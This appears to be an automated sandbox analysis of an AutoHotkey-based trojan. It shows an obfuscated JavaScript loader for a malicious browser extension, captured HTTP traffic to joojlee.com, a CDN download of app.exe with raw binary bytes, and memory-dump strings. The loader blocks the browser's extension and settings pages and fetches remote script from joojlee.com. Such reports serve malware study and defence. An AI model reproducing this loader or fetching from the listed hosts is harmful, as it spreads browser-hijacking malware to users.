cb8..var _0x7dc6=["\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x75\x72\x6C","\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x63\x68\x72\x6F\x6D\x65\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E","\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x72\x65\x73\x65\x74\x50\x72\x6F\x66\x69\x6C\x65\x53\x65\x74\x74\x69\x6E\x67\x73","\x6F\x70\x65\x72\x61\x3A\x2F\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x73\x2F","\x62\x72\x6F\x77\x73\x65\x72\x3A\x2F\x2F\x74\x75\x6E\x65\x2F","\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x68\x65\x6C\x70\x2F","\x69\x64","\x72\x65\x6D\x6F\x76\x65","\x74\x61\x62\x73","\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6F\x6E\x55\x70\x64\x61\x74\x65\x64","\x6C\x65\x6E\x67\x74\x68","\x3C\x61\x6C\x6C\x5F\x75\x72\x6C\x73\x3E","\x62\x6C\x6F\x63\x6B\x69\x6E\x67","\x6F\x6E\x42\x65\x66\x6F\x72\x65\x52\x65\x71\x75\x65\x73\x74","\x77\x65\x62\x52\x65\x71\x75\x65\x73\x74","\x63\x73\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x75\x72\x69","\x70\x75\x73\x68","\x66\x6F\x72\x45\x61\x63\x68","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x70\x61\x72\x73\x65","\x47\x45\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6A\x6F\x6F\x6A\x6C\x65\x65\x2E\x63\x6F\x6D\x2F\x61\x68\x6B\x2F\x67\x65\x74\x2E\x6A\x73\x3F\x63\x61\x63\x68\x65\x3D","\x72\x61\x6E\x64\x6F\x6D","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x64\x65\x76\x74\x6F\x6F\x6C\x73\x3A\x2F\x2F","\x65\x78\x65\x63\x75\x74\x65\x53\x63\

<<< skipped >>>

GET /ahk/req.php?type=key HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:12 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Server: cloudflare-nginx

CF-RAY: 1b81555e04370c6b-AMS

9c..jogoilaonpjembimhekgnboineibhdhf#MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDfjeS5fg1FCFXrERdwKEZfr5X45Y/RZMj /2z7yzUJ4lvtVvy73ryJ /KHvK2wKecsapHK/HXDN9/EPRL4BF/..5d..zhJGDxhQ3KhrHW ouzXBqhrzHpZi 8xB8LOmJ1lTcCJk2H5IvMId83r3ZF QiEnZio9UhsQaR4yQccdXX6CJp3QIDAQAB..0......

GET /ahk/req.php?type=arsiv_hash HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:13 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Server: cloudflare-nginx

CF-RAY: 1b81555f145f0c6b-AMS

20..0c4950e06182df940d3e841551aa4378..0..HTTP/1.1 200 OK..Date: Fri, 13 Feb 2015 13:22:13 GMT..Content-Type: text/javascript; Charset=UTF8..Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..Server: cloudflare-nginx..CF-RAY: 1b81555f145f0c6b-AMS..20..0c4950e06182df940d3e841551aa4378..0..

GET /app.exe HTTP/1.0

User-Agent: Wget/1.5.3.1

Host: 8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com:80

Accept: */*

HTTP/1.0 200 OK

Last-Modified: Fri, 23 Jan 2015 17:14:24 GMT

ETag: 0c4950e06182df940d3e841551aa4378

Origin: hXXps://mycloud.rackspace.com

Content-Length: 31990778

Accept-Ranges: bytes

X-Timestamp: 1422033263.32882

Content-Type: application/x-msdownload

X-Trans-Id: tx696ae59a7f254d19ab13a-0054c281b8dfw1

Cache-Control: public, max-age=101699

Expires: Sat, 14 Feb 2015 17:37:12 GMT

Date: Fri, 13 Feb 2015 13:22:13 GMT

Connection: close

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........f..{5..{5..{5...5..{5..z5(.{5...5..{5...5..{5...5..{5...5..{5...5..{5...5..{5Rich..{5........PE..L...Yj>O.....................d...............0....@..................................................................K..3...L<...........@...........................2...............................................0...............................text...2........................... ..`.rdata..5....0......."..............@..@.data....V...P.......@..............@....CRT.................B..............@..@.rsrc....@.......B...D..............@..@..................................................................................................................................................................................................................................................................................................................................................................@s... s........................................D$..L$....L$.u..D$......S.....D$..d$....D$.....[...............WVS3..D$...}.G.T$.........D$..T$..D$...}.G.T$.........D$..T$...u..L$..D$.3......D$......A...L$..T$..D$...........u......d$....D$.....r.;T$.w.r.;D$.v.N3...Ou........[^_.........WVU3.3..D$...}.GE.T$.........D$..T$..D$...}.G.T$.........D$..T$...u(.L$..D$.3......D$........d$......d$....G...L$..T$..D$...........u......d$....D$.....r.;T$.w.r.;D$.v.N D$..T$.3. D$..T$.My..................Ou........]

<<< skipped >>>

GET /ahk/req.php?type=arsiv_link HTTP/1.0

User-Agent: Wget/1.5.3.1

Host: joojlee.com:80

Accept: */*

HTTP/1.1 302 Found

Date: Fri, 13 Feb 2015 13:22:13 GMT

Content-Type: text/javascript; Charset=UTF8

Connection: close

Set-Cookie: __cfduid=d83c62d96bebba502ef4c4978ed3a11481423833733; expires=Sat, 13-Feb-16 13:22:13 GMT; path=/; domain=.joojlee.com; HttpOnly

Vary: Accept-Encoding

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Location: hXXp://8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com/app.exe

Server: cloudflare-nginx

CF-RAY: 1b81556307370c89-AMS

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

Chromium.exe_1116:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

YYu.Pj

YYu.Pj

!"#$%%&'())* ,-./0123456789:;

!"#$%%&'())* ,-./0123456789:;

VSSSh

VSSSh

E`SSh

E`SSh

SSSSSSSh

SSSSSSSh

urSSSh

urSSSh

WSSSh

WSSSh

zSSShX

zSSShX

t*SSh

t*SSh

t3SSSh

t3SSSh

VWumh0%F

VWumh0%F

u.hL%F

u.hL%F

It.It

It.It

SSSSh

SSSSh

tASSSh

tASSSh

udPS

udPS

uÊ;MP|

uÊ;MP|

!!!!!!""#$%&'(((((())* ,-.CCCCCCCC//C01234445656789:;9:;CCC?@AB

!!!!!!""#$%&'(((((())* ,-.CCCCCCCC//C01234445656789:;9:;CCC?@AB

AutoHotkey

AutoHotkey

AppsKey

AppsKey

ListHotkeys

ListHotkeys

KeyHistory

KeyHistory

DetectHiddenWindows

DetectHiddenWindows

SetKeyDelay

SetKeyDelay

Hotkey

Hotkey

KeyWait

KeyWait

GetKeyState

GetKeyState

URLDownloadToFile

URLDownloadToFile

MsgBox

MsgBox

IfMsgBox

IfMsgBox

AHK Keybd

AHK Keybd